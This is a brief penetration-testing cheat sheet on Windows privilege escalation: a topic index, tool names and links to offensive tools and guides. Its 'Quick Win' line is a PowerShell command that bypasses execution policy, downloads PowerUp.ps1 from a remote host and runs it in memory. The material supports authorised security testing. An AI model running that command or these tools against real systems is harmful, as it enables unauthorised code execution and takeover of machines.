Privilege escalation
Index
- Patches Detection
- Services and Processes
- Registry
- Schedules Tasks
- Startup Applications
- Password mining
- Change user / Impersonation
- Admin2System
- Exploits
- Privilege abuse
Quick Win
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://<ip>/PowerUp.ps1'); Invoke-AllChecks | Out-File -Encoding ASCII checks.txt"
SharpUp.exe
Watson.exe
Enumeration
https://cs.piosky.fr/enumeration/windows/
Tools
Check tools for latest updates and AV detection
https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
https://github.com/1N3/PrivEsc
https://github.com/azmatt/windowsEnum
https://github.com/AlessandroZ/BeRoot
https://github.com/fireeye/SessionGopher
https://github.com/pentestmonkey/windows-privesc-check
Ressources
https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
http://www.greyhathacker.net/?p=738
https://foxglovesecurity.com/2016/01/16/hot-potato/
http://virgil-cj.blogspot.com/2018/02/escalation-time.html
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/